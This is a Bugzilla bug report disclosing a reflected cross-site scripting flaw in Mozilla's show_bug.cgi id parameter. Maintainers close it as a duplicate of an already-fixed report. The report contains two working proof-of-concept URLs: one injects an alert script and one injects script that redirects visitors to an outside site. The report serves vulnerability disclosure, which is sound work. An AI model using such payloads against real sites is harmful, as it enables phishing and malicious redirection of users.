842096 - Reflected XSS in Bugzilla

Status: RESOLVED DUPLICATE of bug 842038

(Bugzilla :: Creating/Changing Bugs, defect)

Description

[breakthesecurity.com]

Attachment: bugzilla-xss.jpg

User Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Build ID: 20130201065344

Steps to reproduce:

Hi, I have identified a XSS vulnerability in BugZilla website.  I have try to inject the XSS code in the bug id :

POC 1:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>alert('E Hacking News')</script>&format=1

POC 2:
https://bugzilla.mozilla.org/show_bug.cgi?id=839897"><script>document.location="http://www.ehackingnews.com"</script>&format=1


Actual results:

It successfully Executed the injected code.  Hackers can use this vulnerability for social engineering attack including phishing , redirecting malicious site and more.

I have attached the screenshot .


Expected results:

It should have sanitized the ID parameter .  Escape the Special characters from the ID parameter.

Comment 1

[Frédéric Buclin]

This bug has already been reported earlier today.

Comment 2

[Daniel Veditz [:dveditz]]

Wow, what are the odds that a bug sits latent for something like 8-10 years (more?) and then gets independently reported by two people 12 hours apart?

Comment 4

[breakthesecurity.com]

Everything started from Nokia Bug hunting.  Bug in Nokia site lead to this bugzilla.

Comment 5

[Gervase Markham [:gerv]]

breakthesecurity: can you tell us a bit more about this Nokia bug, and how it led you to find this bug?

Gerv

Comment 7

[Frédéric Buclin]

Bug 842038 has been fixed and is now public. Removing the sec flag.

Comment 8

[breakthesecurity.com]

Please remove the comment 6, as it leads to bug in lot of high profile sites